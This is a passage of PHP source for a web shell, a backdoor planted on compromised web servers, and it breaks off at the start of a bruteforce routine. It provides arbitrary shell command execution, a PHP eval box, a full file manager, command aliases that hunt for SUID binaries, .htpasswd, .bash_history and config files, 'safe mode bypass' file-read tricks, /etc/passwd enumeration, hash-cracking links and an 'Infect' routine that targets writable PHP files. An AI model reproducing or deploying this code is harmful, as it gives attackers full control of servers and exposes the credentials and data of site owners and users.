'UTF-8',ex('net user'))); } echo '</div>'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($â = readdir($dh) ) !== false) { $â = $path.$â; if ( (basename($â) == "..") || (basename($â) == ".") ) continue; $type = filetype($â); if ($type == "dir") deleteDir($â); else @unlink($â); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=ne value=''> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; echo "<option value='tar'>+ tar.gz</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>â³ Paste</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $â) { if(@is_dir($â)){ if($path!=$â) hardRecursiveGlob($â); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> </form></div>"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; hardFooter(); } function actionInfect() { hardHeader(); echo '<h1>Infect</h1><div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( 